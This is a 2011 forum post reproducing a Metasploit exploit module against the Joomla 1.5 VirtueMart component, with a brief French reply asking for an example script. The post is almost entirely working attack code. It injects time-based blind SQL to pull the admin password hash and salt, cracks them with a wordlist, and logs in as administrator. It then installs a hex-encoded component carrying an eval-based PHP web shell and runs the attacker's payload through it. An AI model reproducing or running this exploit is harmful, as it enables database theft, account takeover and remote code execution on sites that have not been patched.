LLegoLLaS Posted July 28, 2011 Report Share Posted July 28, 2011 # Exploit Title: Joomla 1.5 com_virtuemart <= 1.1.7 blind time-based sql injection MSF module# Date: Thu Jul 28, 2011# Author: TecR0c - tecr0c.mythsec [@] gmail.com# Version: <= 1.1.7# Download: VirtueMart - Files - VirtueMart# Greetz: mythsec team, James Bercega for code base for sqli blindrequire 'msf/core'class Metasploit3 < Msf::Exploit::RemoteRank = GreatRankinginclude Msf::Exploit::Remote::HttpClientdef initialize(info = {})super(update_info(info,'Name' => 'Joomla 1.5 VirtueMart Component <= 1.1.7 Blind SQL Injection','Description' => %q{A vulnerability was discovered by Rocco Calvi and Steve Seeley which identifiesunauthenticated time-based blind SQL injection in the "page" variable of thevirtuemart component. This vulnerability allows an attacker to gain informationfrom the database with specially crafted URLs taking advantage of the MySQLbenchmark. This issue was patched in version 1.1.7a.},'Author' =>['TecR0c', #Initial discovery, msf module'mr_me', #Initial discovery with TecR0c],'License' => MSF_LICENSE,'References' =>[[ 'URL', 'http://www.exploit-db.com/exploits/17132/' ],[ 'URL','http://www.stratsec.net/Research/Advisories/' ],],'Privileged' => false,'Platform' => 'php','Arch' => ARCH_PHP,'Targets' => [[ 'Automatic', { }]],'DisclosureDate' => 'Feb 11 2011','DefaultTarget' => 0 ))register_options([OptString.new('JDIR', [true, 'Joomla directory', '/']),OptInt.new('BMCT', [true, 'Benchmark Counter', 50000000 ]),OptInt.new('BMDF', [true, 'Benchmark Difference', 3 ]),OptInt.new('BMRC', [true, 'Benchmark Request Count', 1 ]),OptString.new('WLIST', [true,'Wordlist location','/home/foo/bar.txt']),OptString.new('AGNT', [false, 'User Agent Info', 'Mozilla/5.0' ]),OptString.new('PREF', [false, 'Database prefixt', 'jos_' ]),OptString.new('JQRY', [false,'URI to trigger bug','index.php?option=com_virtuemart&page=1'])], self.class)end################################################## Extract 
"Set-Cookie"def init_cookie(data, cstr = true)# Raw request? Or cookie data specifically?data = data.headers['Set-Cookie'] ? data.headers['Set-Cookie']: data# Beginningif ( data )# Break them apartdata = data.split(', ')# Initializectmp = ''tmps = {}# Parse cookiesdata.each do | x |# Remove extra datax = x.split(';')[0]# Seperate cookie pairsif ( x =~ /([^;\s]+)=([^;\s]+)/im )# Keyk = $1# Valv = $2# Valid cookie value?if ( v.length() > 0 )# Build cookie hashtmps[k] = v# Report cookie statusprint_status("Got Cookie: #{k} => #{v}");endendend# Build string dataif ( cstr == true )# Looptmps.each do |x,y|# Cookie key/valuectmp << "#{x}=#{y};"end# Assigntmps['cstr'] = ctmpend# Returnreturn tmpselse# Something may be wronginit_debug("No cookies within the given response")endend################################################## Simple debugging outputdef init_debug(resp, exit = 0)# Continue executionif ( exit.to_i > 0 )# Exitexit(0)endend################################################## Generic post wrapperdef http_post(url, data, headers = {}, timeout = 15)# Protocolproto = datastore['SSL'] ? 'https': 'http'# Determine request urlurl = url.length ? 
url: ''# Determine User-Agentheaders['User-Agent'] = headers['User-Agent'] ?headers['User-Agent'] : datastore['AGNT']# Determine Content-Typeheaders['Content-Type'] = headers['Content-Type'] ?headers['Content-Type'] : "application/x-www-form-urlencoded"# Determine Content-Lengthheaders['Content-Length'] = data.length# Determine Refererheaders['Referer'] = headers['Referer'] ?headers['Referer'] : "#{proto}://#{datastore['RHOST']}#{datastore['JDIR']}"# Delete all the null headersheaders.each do | hkey, hval |# Null valueif ( !hval )# Delete header keyheaders.delete(hkey)endend# Send requestresp = send_request_raw({'uri' => datastore['JDIR'] + url,'method' => 'POST','data' => data,'headers' => headers},timeout )# Returnedreturn respend################################################## Generic post multipart wrapperdef http_post_multipart(url, data, headers = {}, timeout = 15)# Boundary stringbndr = Rex::Text.rand_text_alphanumeric(8)# Protocolproto = datastore['SSL'] ? 'https': 'http'# Determine request urlurl = url.length ? url: ''# Determine User-Agentheaders['User-Agent'] = headers['User-Agent'] ?headers['User-Agent'] : datastore['AGNT']# Determine Content-Typeheaders['Content-Type'] = headers['Content-Type'] ?headers['Content-Type'] : "multipart/form-data; boundary=#{bndr}"# Determine Refererheaders['Referer'] = headers['Referer'] ?headers['Referer'] : "#{proto}://#{datastore['RHOST']}#{datastore['JDIR']}"# Delete all the null headersheaders.each do | hkey, hval |# Null valueif ( !hval )# Delete header keyheaders.delete(hkey)endend# Inittemp = ''# Parse form valuesdata.each do |name, value|# Hash means file dataif ( value.is_a?(Hash) )# Validate form fieldsfilename = value['filename'] ? value['filename']:init_debug("Filename value missing from #{name}", 1)contents = value['contents'] ? value['contents']:init_debug("Contents value missing from #{name}", 1)mimetype = value['mimetype'] ? 
value['mimetype']:init_debug("Mimetype value missing from #{name}", 1)encoding = value['encoding'] ? value['encoding']: "Binary"# Build multipart datatemp << "--#{bndr}\r\n"temp << "Content-Disposition: form-data; name=\"#{name}\"; filename=\"#(unknown)\"\r\n"temp << "Content-Type: #{mimetype}\r\n"temp << "Content-Transfer-Encoding: #{encoding}\r\n"temp << "\r\n"temp << "#{contents}\r\n"else# Build multipart datatemp << "--#{bndr}\r\n"temp << "Content-Disposition: form-data; name=\"#{name}\";\r\n"temp << "\r\n"temp << "#{value}\r\n"endend# Complete the form datatemp << "--#{bndr}--\r\n"# Assigneddata = temp# Determine Content-Lengthheaders['Content-Length'] = data.length# Send requestresp = send_request_raw({'uri' => datastore['JDIR'] + url,'method' => 'POST','data' => data,'headers' => headers},timeout)# Returnedreturn respend################################################## Generic get wrapperdef http_get(url, headers = {}, timeout = 15)# Protocolproto = datastore['SSL'] ? 'https': 'http'# Determine request urlurl = url.length ? url: ''# Determine User-Agentheaders['User-Agent'] = headers['User-Agent'] ?headers['User-Agent'] : datastore['AGNT']# Determine Refererheaders['Referer'] = headers['Referer'] ?headers['Referer'] : "#{proto}://#{datastore['RHOST']}#{datastore['JDIR']}"# Delete all the null headersheaders.each do | hkey, hval |# Null value // Also, remove post specific data, due to a bug ...if ( !hval || hkey == "Content-Type" || hkey == "Content-Length" )# Delete header keyheaders.delete(hkey)endend# Send requestresp = send_request_raw({'uri' => datastore['JDIR'] + url,'headers' => headers,'method' => 'GET',}, timeout)# Returnedreturn respend################################################## Used to perform benchmark querysdef sql_benchmark(test, hdrs, table = nil, where = '1+LIMIT+1', tnum = nil )# Initwait = 0# Defaultstable = table ? 
table: 'users'# SQL Injection string used to trigger the MySQL BECNHMARK() functionsqli = ("'+UNION+SELECT+IF(#{test},+BENCHMARK(#{datastore['BMCT']},\+MD5(1)),+0)+FROM+#{datastore['PREF']}#{table}+WHERE+#{where}--+sqli.page")# Number of tests to run. We run this# amount of tests and then look for a# median value that is greater than# the benchmark difference.tnum = tnum ? tnum: datastore['BMRC']# Run the teststnum.to_i.times do | i |# Start timebmc1 = Time.now.to_i# Make the requestinit_debug(http_get("#{datastore['JQRY']}#{sqli}", hdrs))# End timebmc2 = Time.now.to_i# Total timewait += bmc2 - bmc1end# Return the resultsreturn ( wait.to_i / tnum.to_i )end################################################## Used to perform benchmark querysdef sql_benchmark_2(hdrs, columns = nil, table = nil, where = '1+LIMIT+1', tnum = nil )# Initwait = 0# Defaultstable = table ? table: 'users'# SQL Injection string used to trigger the MySQL BECNHMARK() functionsqli = ("'+UNION+SELECT+IF(substring((select+#{columns}+FROM+#{datastore['PREF']}#{table}+WHERE+#{where}),1,1),BENCHMARK(#{datastore['BMCT']},+MD5(1)),+0)--+sqli.page")# Number of tests to run. We run this# amount of tests and then look for a# median value that is greater than# the benchmark difference.tnum = tnum ? 
tnum: datastore['BMRC']# Run the teststnum.to_i.times do | i |# Start timebmc1 = Time.now.to_i# Make the requestinit_debug(http_get("#{datastore['JQRY']}#{sqli}", hdrs))# End timebmc2 = Time.now.to_i# Total timewait += bmc2 - bmc1end# Return the resultsreturn ( wait.to_i / tnum.to_i )end#################################################def get_password(hash, salt, opts = nil)# Wordlistwlst = datastore['WLIST']# Initcntr = 0# Verboseprint_status("Attempting to crack admin password hash")# Valid hash length onlyif ( hash.length != 32 )# Failureprint_error("Invalid Joomla MD5 hash: #{hash.to_s}")return nilend# Does the wordlist exist?if ( !File.exist?(wlst) )# Failureprint_error("Unable to load wordlist: #{wlst}")return nilelse# Load the wordlist filelist = File.readlines(wlst)end# Verboseprint_status("Loaded #{list.count.to_s} words from the specified list")print_status("This may take quite some time ...")# Start timebmc1 = Time.now.to_i# Loop through listlist.each do | word |# Cleanupword = word.strip# Countercntr = cntr + 1# Attempt to find the plaintext passwordif ( hash == Rex::Text.md5(word + salt) )# Success!print_status("Successfully cracked the following hash")print_status("#{hash} => #{salt} == #{word}")# Ended timebmc2 = Time.now.to_i# Durationbmc3 = bmc2 - bmc1bmc3 = ( bmc3 < 60 ) ? "#{bmc3} seconds": "#{(bmc3/60)} minutes"# Verboseprint_status("Operation completed in #{bmc3}")# Returnreturn wordend # ifend # each# Failureprint_error("Unable to crack the following hash")print_error("#{hash} => #{salt} == ???")# Ended timebmc2 = Time.now.to_i# Durationbmc3 = bmc2 - bmc1bmc3 = ( bmc3 < 60 ) ? 
"#{bmc3} seconds": "#{(bmc3/60)} minutes"# Verboseprint_status("Operation completed in #{bmc3}")# Returnreturn nilend#################################################def get_users_data(hdrs, snum, slim, cset, sqlf, sqlw)# Start timetot1 = Time.now.to_i# Initializereqc = 0retn = String.new# Extract saltfor i in snum..slim# Offset positionoset = ( i - snum ) + 1# Loop charsetfor cbit in cset# Test charactercbit.each do | cchr |# Start time (overall)bmc1 = Time.now.to_i# Benchmark querybmcv = sql_benchmark("SUBSTRING(#{sqlf},#{i},1)+LIKE+BINARY+CHAR(#{cchr.ord})",hdrs,"users", sqlw, datastore['BMRC'])# Noticable delay? We must have a match! if ( bmcv >= ( datastore['BMC0'] + datastore['BMDF'].to_i ) )# Verboseprint_status(sprintf("Character %02s is %s", oset.to_s, cchr ))# Append chrretn << cchr# Exit loopbreakend# Counterreqc += 1end # eachend # for# Host not vulnerable?if ( oset != retn.length )# Failureprint_error("Unable to extract character ##{oset.to_s}\. Extraction failed!")return nilendend # for# End time (total)tot2 = Time.now.to_i# Benchmark totalstot3 = tot2 - tot1# Verboseprint_status("Found data: #{retn}")print_status("Operation required #{reqc.to_s} requests (#{( tot3 / 60).to_s} minutes)")# Returnreturn retnend#################################################def checkprint_status("Attempting to determine virtuemart version")resp = http_get("modules/mod_virtuemart_currencies/mod_virtuemart_currencies.xml")# Extract Joomla version informationif ( resp.body =~ /<version>([^\s]+)<\/version>/ )# Versionvers = $1.strip# Version "parts"ver1, ver2, ver3 = vers.split(/\./)# Only if version 1.1.7if ( ver3.to_i >= 7)# Exploit failedinit_debug(resp)print_status("Please confirm manually")return Exploit::CheckCode::Safeelseprint_status("The target is running VirtueMart : #{vers}")return Exploit::CheckCode::Vulnerableendelse# Verboseprint_error("Unable to determine Joomla version ...")endend#################################################def exploit# Numeric test 
stringtstr = Time.now.to_i.to_s# MD5 test stringtmd5 = Rex::Text.md5(tstr)# Encoded payloadload = payload.encoded################################################## STEP 02 // Get the cookie for virtuemart ################################################## request to get virtuemart cookieresp = http_get("index.php?option=com_virtuemart&page=1")# Init cookiecook = init_cookie(resp)# Build headers for authenticated sessionhdrs = { "Cookie" => cook['cstr'] }################################################## STEP 03 // Calculate BENCHMARK() response times################################################## Verboseprint_status("Calculating target response times")print_status("Benchmarking #{datastore['BMRC']} normal requests")# Normal request median (globally accessible)datastore['BMC0'] = sql_benchmark("1=2", hdrs)# Verboseprint_status("Normal request avg: #{datastore['BMC0'].to_s} seconds")print_status("Benchmarking #{datastore['BMRC']} delayed requests")# Delayed request medianbmc1 = sql_benchmark("1=1", hdrs)# Verboseprint_status("Delayed request avg: #{bmc1.to_s} seconds")# Benchmark totalsbmct = bmc1 - datastore['BMC0']# Delay too small. The host may not be# vulnerable. Try increasing the BMCT.if ( bmct.to_i < datastore['BMDF'].to_i )# Verboseprint_error("your benchmark threshold is small, or host is not vulnerable")print_error("increase the benchmark threshold adjust the value of the BMDF")print_error("increase the expression iterator adjust the value of the BMCT")returnelse# Host appears exploitableprint_status("Request Difference: #{bmct.to_s} seconds")end################################################## STEP 04 // Attempting to find a valid admin id#################################################atot = 0 # Total adminsscnt = 0 # Step counterstep = 10 # Step incrementslim = 10000 # Step limit# 42 is the hard coded base uid within Joomla ...# ... and the answer to the ultimate question! ;]snum = ( !defined?(auid) ) ? 
62: auid # changed from 42 to 62# Verboseprint_status("Calculating total number of administrators")# Check how many admin accounts are in the databasefor i in 0..slim do# Benchmarkbmcv = sql_benchmark_2(hdrs, "gid", "users", "gid=25+LIMIT+#{i.to_s},1",datastore['BMRC'])# If we do not have a delay, then we have reached the end ...if ( !( bmcv >= ( datastore['BMC0'] + datastore['BMDF'].to_i ) ) )# Rangeatot = i# Verboseprint_status("Successfully confirmed #{atot.to_s} admin accounts")# Exit loopbreakendend# Loops until limitwhile ( snum < slim && scnt < atot )# Verboseprint_status("Attempting to find a valid admin ID")# Verboseprint_status("Stepping from #{snum.to_s} to #{slim.to_s} by #{step.to_s}")for i in snum.step(slim, step)bmcv = 0# Benchmarkbmcv = sql_benchmark("#{i}+>+id", hdrs, "users","gid=25+LIMIT+#{scnt.to_s},1", datastore['BMRC'])# Noticable delay? We must have a match! if ( bmcv >= ( datastore['BMC0'] + datastore['BMDF'].to_i ) )# Rangeitmp = i# Exit loopbreakelse# Out of time ..if ( i == slim )# Failureprint_error("Unable to find a valid user id. Exploit failed!")returnendendend# Jump back by #{step} and increment by onefor i in ( snum ).upto(( itmp ))bmcv = 0auid = 0# Benchmarkbmcv = sql_benchmark("id+=+#{i}", hdrs, "users", "gid=25",datastore['BMRC'])# Noticable delay? We must have a match! if ( bmcv >= ( datastore['BMC0'] + datastore['BMDF'].to_i ) )# UserID - first time auid gets set to 62auid = i# Verboseprint_status("Found a valid admin account uid : #{auid.to_s}")# Step Counterscnt += 1# Exit loopbreakelse# Out of time ..if ( i == ( itmp + step ) )# Failureprint_error("Unable to find a valid user id. 
Exploit failed!")returnendendend################################################## These are the charsets used for the enumeration# operations and can be easily expanded if needed################################################## Hash charset a-f0-9hdic = [ ('a'..'f'), ('0'..'9') ]# Salt charset a-zA-Z0-9sdic = [ ('a'..'z'), ('A'..'Z'), ('0'..'9') ]# Username charsetudic = [ ('a'..'z'), ('A'..'Z'), ('0'..'9') ]################################################## STEP 05 // Attempt to extract admin pass hash################################################## Verboseprint_status("Attempting to gather admin password hash")# Get pass hash - changed bsif ( auid != 0 && !( hash = get_users_data(hdrs, # Pass cookie value1, # Length Start32, # Length Maximumhdic, # Charset Array"password", # SQL Field name"id=#{auid.to_s}" # SQL Where data) ) )# Failureprint_error("Unable to gather admin pass hash. Exploit failed!!")returnend################################################## STEP 06 // Attempt to extract admin pass salt################################################## Verboseprint_status("Attempting to gather admin password salt")# Get pass salt - changed bsif ( auid != 0 && !( salt = get_users_data(hdrs, # Pass cookie value34, # Length Start65, # Length Maximumsdic, # Charset Array"password", # SQL Field name"id=#{auid.to_s}" # SQL Where data) ) )# Failureprint_error("Unable to gather admin pass salt. Exploit failed!!")returnend################################################## STEP 07 // Attempt to crack the extracted hash################################################## Attempt to crack password hash - changed bsif ( auid != 0 )pass = get_password(hash, salt)end# Got pass? 
- changed bsif ( auid != 0 && pass )################################################## STEP 08 // Attempt to extract admin username################################################## Verboseprint_status("Attempting to determine target username length")# Hard limit is 150for i in 1.upto(150)# Benchmarkbmcv = sql_benchmark("LENGTH(username)=#{i.to_s}", hdrs,"users", "id=#{auid.to_s}", datastore['BMRC'])# Noticable delay? We must have a match! if ( bmcv >= ( datastore['BMC0'] + datastore['BMDF'].to_i ) )# Lengthulen = i# Verboseprint_status("The username is #{i.to_s} characters long")# Exit loopbreakendend# Verboseprint_status('Gathering admin username')# Get pass saltif ( !( user = get_users_data(hdrs, # Pass cookie value1, # Length Startulen, # Length Maximumudic, # Charset Array"username", # SQL Field name"id=#{auid.to_s}" # SQL Where data) ) )# Failureprint_error("Unable to gather admin user name. Exploit failed!!")returnend# Verboseprint_status("Attempting to extract a valid request token")# Request a valid tokenresp = http_get("administrator/index.php")# Extract tokenif ( resp.body =~ /['|"]([a-f0-9]{32})["|']/ )# Tokenrtok = $1# Verboseprint_status("Got token: #{rtok}")else# Failureprint_error("Unable to extract request token. Exploit failed!")init_debug(resp)returnend# Init cookiecook = init_cookie(resp)# Build headers for authenticated sessionhdrs = { "Cookie" => cook['cstr'] }################################################## STEP 09 // Attempt to authenticate as the admin################################################## Verboseprint_status("Attempting to login as: #{user}")# Post data for login requestpost = "username=#{user}&passwd=#{pass}\?=&option=com_login&task=login{rtok}=1"# Login requestresp = http_post("administrator/index.php", post, hdrs)# Authentication successful???if ( resp && resp.code == 303 )# Successprint_status("Successfully logged in as: #{user}")else# Failureprint_error("Unable to authenticate. 
Exploit failed!")init_debug(resp)returnend################################################## STEP 10 // Upload wrapper and execute payload!################################################## Verboseprint_status("Attempting to extract refreshed request token")# Request a valid token (again)resp = http_get("administrator/index.php?option=com_installer",hdrs)# Extract tokenif ( resp.body =~ /['|"]([a-f0-9]{32})["|']/ )# Tokenrtok = $1# Verboseprint_status("Got token: #{rtok}")else# Failureprint_error("Unable to extract request token. Exploit failed!")init_debug(resp.body)returnend# Component specific datacstr = "joomla"czip = "com_#{cstr}.zip"curi = "components/com_#{cstr}/#{cstr}.php"################################################## Our Joomla specific PHP payload wrapper that is# used to have more flexibility when delivering a# selected payload to a target. The wrapper is in# the Joomla! 1.6 compononent format and can also# be used with other Joomla exploits.################################################### Type: Joomla 1.6 Component# File: com_joomla/joomla.xml <-- installer file# com_joomla/joomla.php <-- component file## Data: <?php# # Modify settings# error_reporting(0);# ini_set('max_execution_time', 0);## # Execute the selected payload, and delete the wrapper# @eval(base64_decode(file_get_contents('php://input')));# ?>################################################## Hex encoded component zip datawrap = "\x50\x4B\x03\x04\x0A\x00\x00\x00\x00\x00\x65\xB3\x9A\x3E\x00\x00"wrap << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0B\x00\x00\x00\x63\x6F"wrap << "\x6D\x5F\x6A\x6F\x6F\x6D\x6C\x61\x2F\x50\x4B\x03\x04\x0A\x00\x00"wrap << "\x00\x00\x00\x35\xB2\x9A\x3E\x53\x03\xF2\xF9\xAF\x00\x00\x00\xAF"wrap << "\x00\x00\x00\x15\x00\x00\x00\x63\x6F\x6D\x5F\x6A\x6F\x6F\x6D\x6C"wrap << "\x61\x2F\x6A\x6F\x6F\x6D\x6C\x61\x2E\x70\x68\x70\x3C\x3F\x70\x68"wrap << "\x70\x0D\x0A\x23\x20\x4D\x6F\x64\x69\x66\x79\x20\x73\x65\x74\x74"wrap << 
"\x69\x6E\x67\x73\x0D\x0A\x65\x72\x72\x6F\x72\x5F\x72\x65\x70\x6F"wrap << "\x72\x74\x69\x6E\x67\x28\x30\x29\x3B\x0D\x0A\x69\x6E\x69\x5F\x73"wrap << "\x65\x74\x28\x27\x6D\x61\x78\x5F\x65\x78\x65\x63\x75\x74\x69\x6F"wrap << "\x6E\x5F\x74\x69\x6D\x65\x27\x2C\x20\x30\x29\x3B\x0D\x0A\x0D\x0A"wrap << "\x23\x20\x45\x78\x65\x63\x75\x74\x65\x20\x74\x68\x65\x20\x73\x65"wrap << "\x6C\x65\x63\x74\x65\x64\x20\x70\x61\x79\x6C\x6F\x61\x64\x0D\x0A"wrap << "\x40\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63"wrap << "\x6F\x64\x65\x28\x66\x69\x6C\x65\x5F\x67\x65\x74\x5F\x63\x6F\x6E"wrap << "\x74\x65\x6E\x74\x73\x28\x27\x70\x68\x70\x3A\x2F\x2F\x69\x6E\x70"wrap << "\x75\x74\x27\x29\x29\x29\x3B\x0D\x0A\x3F\x3E\x50\x4B\x03\x04\x0A"wrap << "\x00\x00\x00\x00\x00\x91\xB6\x9A\x3E\x8D\x4A\x99\xA9\x07\x01\x00"wrap << "\x00\x07\x01\x00\x00\x15\x00\x00\x00\x63\x6F\x6D\x5F\x6A\x6F\x6F"wrap << "\x6D\x6C\x61\x2F\x6A\x6F\x6F\x6D\x6C\x61\x2E\x78\x6D\x6C\x3C\x3F"wrap << "\x78\x6D\x6C\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x2E\x30"wrap << "\x22\x20\x65\x6E\x63\x6F\x64\x69\x6E\x67\x3D\x22\x75\x74\x66\x2D"wrap << "\x38\x22\x3F\x3E\x0D\x0A\x3C\x65\x78\x74\x65\x6E\x73\x69\x6F\x6E"wrap << "\x20\x74\x79\x70\x65\x3D\x22\x63\x6F\x6D\x70\x6F\x6E\x65\x6E\x74"wrap << "\x22\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x2E\x36\x2E\x30"wrap << "\x22\x3E\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x6E\x61"wrap << "\x6D\x65\x3E\x4A\x6F\x6F\x6D\x6C\x61\x3C\x2F\x6E\x61\x6D\x65\x3E"wrap << "\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x3C\x66\x69\x6C\x65\x73"wrap << "\x20\x66\x6F\x6C\x64\x65\x72\x3D\x22\x73\x69\x74\x65\x22\x3E\x3C"wrap << "\x66\x69\x6C\x65\x6E\x61\x6D\x65\x3E\x6A\x6F\x6F\x6D\x6C\x61\x2E"wrap << "\x70\x68\x70\x3C\x2F\x66\x69\x6C\x65\x6E\x61\x6D\x65\x3E\x3C\x2F"wrap << "\x66\x69\x6C\x65\x73\x3E\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20"wrap << "\x20\x3C\x61\x64\x6D\x69\x6E\x69\x73\x74\x72\x61\x74\x69\x6F\x6E"wrap << "\x3E\x3C\x6D\x65\x6E\x75\x3E\x4A\x6F\x6F\x6D\x6C\x61\x3C\x2F\x6D"wrap << 
"\x65\x6E\x75\x3E\x3C\x2F\x61\x64\x6D\x69\x6E\x69\x73\x74\x72\x61"wrap << "\x74\x69\x6F\x6E\x3E\x0D\x0A\x3C\x2F\x65\x78\x74\x65\x6E\x73\x69"wrap << "\x6F\x6E\x3E\x0D\x0A\x50\x4B\x01\x02\x14\x00\x0A\x00\x00\x00\x00"wrap << "\x00\x65\xB3\x9A\x3E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"wrap << "\x00\x0B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00"wrap << "\x00\x00\x00\x63\x6F\x6D\x5F\x6A\x6F\x6F\x6D\x6C\x61\x2F\x50\x4B"wrap << "\x01\x02\x14\x00\x0A\x00\x00\x00\x00\x00\x35\xB2\x9A\x3E\x53\x03"wrap << "\xF2\xF9\xAF\x00\x00\x00\xAF\x00\x00\x00\x15\x00\x00\x00\x00\x00"wrap << "\x00\x00\x00\x00\x20\x00\x00\x00\x29\x00\x00\x00\x63\x6F\x6D\x5F"wrap << "\x6A\x6F\x6F\x6D\x6C\x61\x2F\x6A\x6F\x6F\x6D\x6C\x61\x2E\x70\x68"wrap << "\x70\x50\x4B\x01\x02\x14\x00\x0A\x00\x00\x00\x00\x00\x91\xB6\x9A"wrap << "\x3E\x8D\x4A\x99\xA9\x07\x01\x00\x00\x07\x01\x00\x00\x15\x00\x00"wrap << "\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x0B\x01\x00\x00\x63"wrap << "\x6F\x6D\x5F\x6A\x6F\x6F\x6D\x6C\x61\x2F\x6A\x6F\x6F\x6D\x6C\x61"wrap << "\x2E\x78\x6D\x6C\x50\x4B\x05\x06\x00\x00\x00\x00\x03\x00\x03\x00"wrap << "\xBF\x00\x00\x00\x45\x02\x00\x00\x00\x00"# Verboseprint_status("Attempting to upload payload wrapper component")# Post datadata = {# Component data'install_package' =>{'filename' => czip,'contents' => wrap,'mimetype' => 'application/zip','encoding' => 'binary',},# Required install params"installtype" => "upload","task" => "install.install","#{rtok}" => "1",}# Upload the wrapper componentinit_debug(http_post_multipart("administrator/index.php?option=\com_installer&view=install", data, hdrs))# Deliver the selected payload to the targetinit_debug(http_post(curi, Rex::Text.encode_base64(load)))# Shellhandlerreturnelse# Verboseprint_error("Failed to crack hash. Searching for new admin account ...")end # ifsnum += 1end # while# Verboseprint_error("Unable to crack any admin hashes. 
Try a better wordlist?")returnendendsursa: Joomla 1.5 com_virtuemart <= 1.1.7 Blind time-based SQL Injection (MSF) - BugSearch.net
==LILO== Posted July 28, 2011 Pouvez-vous donner un exemple de script